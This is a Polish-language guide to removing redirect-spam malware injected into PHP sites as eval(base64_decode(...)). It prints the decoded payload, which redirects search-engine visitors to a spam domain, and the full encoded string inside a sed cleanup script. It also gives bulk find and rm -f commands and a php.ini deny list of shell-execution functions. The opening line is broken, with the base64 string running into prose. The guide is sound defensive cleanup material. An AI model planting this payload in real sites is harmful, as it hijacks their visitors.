eval(base64_decode("DQplcpo z dekodowaniu kod może wyglądać tak:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://gigop.americanunfinished.com/");
exit();
}
}
}
Kod ten w sposób losowy przekierowuje nas na inne strony podczas klikania w linki, a także dopisuje na końcu naszej strony linki mające podnieść spamerskie strony wyżej w rankingu google.
Do infekcji wykorzystuje prawdopodobnie luki w popularnych CMS lub co bardziej prawdopodobne infekuje komputer właściciela strony trojanem, który to wyciąga hasła z klientów FTP.
Jak poradzić sobie z takim atakiem?
Jeżeli serwer jest dedykowany i mamy dostęp do konsoli możemy wykorzystać ten skrypt:
#!/bin/sh
src=$1.hack
dst=$1
mv $dst $src
sed -e 's,eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));,,g' $src > $dst
Oczywiście podstawiam pod "DQplcnJvcl9yZXBvcnRpbmc..." kod który jest u nas zapisany, wersji tego kodu jest z pewności bardzo dużo.
Skrypt zapisujemy pod nazwą clean.sh i wysyłamy na serwer.
Z konsoli serwera wystarczy już tylko odpalić komendę:
find . -name '*.php' -exec ./clean.sh \{\} \;Zachowa ona stare pliki pod rozszerzeniem .hack a plik .php będą już bez złośliwego kodu.
Po sprawdzeniu czy strona działa poprawnie możemy usunąć pliki z dopiskiem poprzez komendę:
find . -name '*.hack' -exec rm -f \{\} \;
A co jeśli nie mamy dostępu do konsoli?
W takim wypadku skorzystać możemy z programu FileZilla, po połączeniu się z jego pomocą z serwerem, z paska narzędzi wybieramy serwer->Szukaj zdalnych plików (F3).
Wybieramy opcję "nazwa pliku" - "kończy się na" - ".php"
i klikamy szukaj, gdy wszystkie pliki zostaną odnalezione zaznaczamy wszystkie, ppm, pobierz.
Zostawiamy domyślne opcje, które zachowają strukturę folderów z serwera.
Gdy wszystkie pliki php z naszego serwera są u nas na dysku wystarczy użyć programu notepad++ do usunięcia niepotrzebnego kodu.
W programie wciskamy ctrl+shift+f, wybieramy folder z naszymi plikami i uzupełniamy okno szukany tekst naszym złośliwym kodem, klikamy zamień w plikach i gotowe.
Oczyściliśmy nasze pliki ze złośliwego kodu, wystarczy je teraz z powrotem wgrać na serwer.
Co zrobić by sytuacja się nie powtórzyła?
1. Aktualizować skrypty CMSa, forum, bloga.
2. Przeskanować komputer którym się łączymy z serwerem przy pomocy programu Spybot Search and Destroy
3. Do pliku php.ini dopisać restrykcje:
allow_url_fopen = off
allow_url_include = off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"
